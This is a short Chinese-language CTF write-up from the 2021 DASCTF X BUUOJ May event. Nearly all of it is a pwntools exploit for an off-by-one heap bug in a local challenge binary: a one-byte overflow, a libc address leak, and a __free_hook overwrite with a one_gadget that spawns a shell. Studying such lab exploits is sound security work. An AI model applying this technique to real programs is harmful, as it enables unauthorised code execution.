

[复现]2021 DASCTF X BUUOJ 五月大联动

由于我没有 Ubuntu 16，就不复现第一个题了，直接复现第二个。

正常的off by one

from pwn import *

context.os = 'linux'
context.log_level = "debug"

# Target binary and the libc shipped with the challenge; the hard-coded
# offsets used later in this script are only valid for that libc build.
p = process('./pwn')
libc = ELF('./libc.so')
elf = ELF('./pwn')


# Thin wrappers around the tube `p`.  Each outgoing payload is passed through
# str(), which is a no-op for Python 2 str/bytes; NOTE(review): under Python 3
# str() on a bytes object would send its repr rather than its contents, so this
# script presumably expects Python 2 pwntools.
def s(data):
	"""Send `data` without a trailing newline."""
	return p.send(str(data))


def sa(delim, data):
	"""Wait for `delim`, then send `data` without a trailing newline."""
	return p.sendafter(str(delim), str(data))


def sl(data):
	"""Send `data` followed by a newline."""
	return p.sendline(str(data))


def sla(delim, data):
	"""Wait for `delim`, then send `data` followed by a newline."""
	return p.sendlineafter(str(delim), str(data))


def r(num):
	"""Receive up to `num` bytes."""
	return p.recv(num)


def ru(delims, drop=True):
	"""Receive up to `delims`; with `drop` the delimiter itself is discarded."""
	return p.recvuntil(delims, drop)


def itr():
	"""Hand the tube over to the user."""
	return p.interactive()


def uu32(data):
	"""Unpack a little-endian u32 from `data`, zero-padded on the right to 4 bytes."""
	return u32(data.ljust(4, b'\x00'))


def uu64(data):
	"""Unpack a little-endian u64 from `data`, zero-padded on the right to 8 bytes."""
	return u64(data.ljust(8, b'\x00'))


def leak(name, addr):
	"""Log `addr` as a hex value labelled `name`."""
	return log.success('{} = {:#x}'.format(name, addr))

def debug():
	"""Attach gdb to the running target `p` and pause the script until resumed."""
	gdb.attach(p)
	# Block here so breakpoints can be placed before the exploit continues.
	pause()

def add(idx, size, con):
	"""Menu option 1: create card `idx` with `size` bytes and fill it with `con`.

	`con` is sent raw after the "quickly!" prompt (no trailing newline), so the
	caller decides exactly how many bytes the program receives.  `sla` already
	applies str() to its argument, so `idx` and `size` are passed through as-is.
	"""
	sla("choice:", "1")
	sla("please choice your card:", idx)
	sla("Infuse power:\n", size)
	sa("quickly!", con)

def edit(idx, con):
	"""Menu option 2: overwrite the contents of card `idx` with `con`.

	Unlike `add`, the content is sent with a trailing newline via `sla`.
	"""
	sla("choice:", "2")
	sla("please choice your card\n", idx)
	sla("start your bomb show\n", con)

def delete(idx):
	"""Menu option 3: release card `idx`."""
	sla("choice:", "3")
	sla("Which card:", idx)

def show(idx):
	"""Menu option 4: print the contents of card `idx`; the output is left in the tube."""
	sla("choice:", "4")
	sla("index:", idx)

# --- exploit body ----------------------------------------------------------
# Card sizes, indices and the two hard-coded libc offsets (0x3EBCA0, 0x4f302)
# are specific to this challenge binary and its bundled ./libc.so; on any
# other libc build both constants have to be recomputed.
add(0,0x18,'bpc')
add(1,0x20,'bpc')
add(2,0x20,'bpc')
add(3,0x20,'bpc')

# Seven 0x80-byte cards are allocated and then freed in the same order.
for i in range(4, 11):
	add(i, 0x80, "bpc")
for i in range(4, 11):
	delete(i)
# 0x19 bytes written into the 0x18-byte card 0: 0x10 filler, an 8-byte zero,
# and one extra byte (0x91) -- the single-byte overflow the post's title refers to.
# NOTE(review): 'a'*0x10 + p64(0) relies on p64() returning str (Python 2
# pwntools); under Python 3 this concatenation raises TypeError.
pl = 'a'*0x10 + p64(0) + p8(0x91)
edit(0,pl)
delete(1)
add(1,0x20,'bpc')
# show(2) prints card 2; the six bytes following the "dedededededede:" banner
# are read as a little-endian pointer and the fixed offset is subtracted to
# obtain the libc base.
show(2)
ru("dedededededede:")
libcbase = uu64(r(6)) - 0x3EBCA0
leak('libcbase',libcbase)
free_hook = libcbase + libc.sym['__free_hook']
# Despite its name, `system` is the 0x4f302 address from the block comment
# below (which looks like one_gadget output), not libc's system().
system = libcbase + 0x4f302
add(11,0x20,'bpc')
delete(11)
edit(2, p64(free_hook))
add(11, 0x20, "bpc")
add(12, 0x20,p64(system))
'''
0x4f2a5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL

0x4f302 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a2fc execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''
#debug()
# The final delete is the trigger; itr() then hands the tube to the user.
delete(12)

itr()

